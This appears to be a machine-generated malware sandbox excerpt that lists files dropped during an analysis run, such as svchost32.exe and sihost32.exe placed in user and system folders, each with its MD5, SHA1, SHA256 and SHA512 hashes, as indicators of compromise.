C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| Hash | Value |
| --- | --- |
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | a9eefee1cdccd47459b474fa81f53ef6 |
| SHA1 | c719b583efed694615235819161879cc36a45aff |
| SHA256 | c99bc609a9b7674042b44889a0b498556f1c3fb45125d6452a4e983fdeaa3982 |
| SHA512 | d76c1bcb6f79fcccefe887a663333e2f9b4d2affaa12a381bda408593938148ad64d74b22ea94ffe3e70cc61b44f9a4d6d82a73bfe8f2871bd20c5a3bb2ed2ea |
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
| Hash | Value |
| --- | --- |
| MD5 | 0a36dbea88311baeb376ff6fb3ea0a3a |
| SHA1 | 100d0b18060351080e63c3e920017056bc6ad9ee |
| SHA256 | a3d218dbf74614c2beacec478f3d04160e2757022303a105c6a7fe25d044ff6b |
| SHA512 | ad329ddc01dfd4137964aab22de4471f687e44fe2bce98e1efce04f70074d38ba650d59b33fa8430035c54be401f4f751ea94b5ef0ccf60e6b0eb24d816087d8 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mbuilder.exe.log
| Hash | Value |
| --- | --- |
| MD5 | 28d7fcc2b910da5e67ebb99451a5f598 |
| SHA1 | a5bf77a53eda1208f4f37d09d82da0b9915a6747 |
| SHA256 | 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c |
| SHA512 | 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 9b80cd7a712469a4c45fec564313d9eb |
| SHA1 | 6125c01bc10d204ca36ad1110afe714678655f2d |
| SHA256 | 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d |
| SHA512 | ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 07a771c4f31f62b2d04e2befaa36dce7 |
| SHA1 | 662952ede6c1acbb575e8149a5ac2f08edade811 |
| SHA256 | a2df2570980e1123d9af8e12a27a82d3a4d332f0e7dd44e4e225743207c099b3 |
| SHA512 | 9e339a2d0bfaf5bbe5252f69061652c5880fe1233930830ca7190a65516366e05129907b1656a6790c0093ad82ac73ddee6738d0b78ecb1e3d888f467b889fe9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | e5663972c1caaba7088048911c758bf3 |
| SHA1 | 3462dea0f9c2c16a9c3afdaef8bbb1f753c1c198 |
| SHA256 | 9f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e |
| SHA512 | ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost32.exe.log
| Hash | Value |
| --- | --- |
| MD5 | b245679121623b152bea5562c173ba11 |
| SHA1 | 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d |
| SHA256 | 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f |
| SHA512 | 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c |
C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
| Hash | Value |
| --- | --- |
| MD5 | ecd7d7be630be740725bb52e73dafec0 |
| SHA1 | 7def3f5a97ffbd07ad81357262b0c0b49859276d |
| SHA256 | 76b4687442dd515b5e7399abb4a4f603b0634c37ff6b47ed51efae68e0d71706 |
| SHA512 | 412d282c9018c909ea15f6aa2f1651eb4f46ed332b6084f17b58ada74b685a1d357cc71debed5b027973e84760cb6f2d7acd0e759e5850f7c261af472b3bab45 |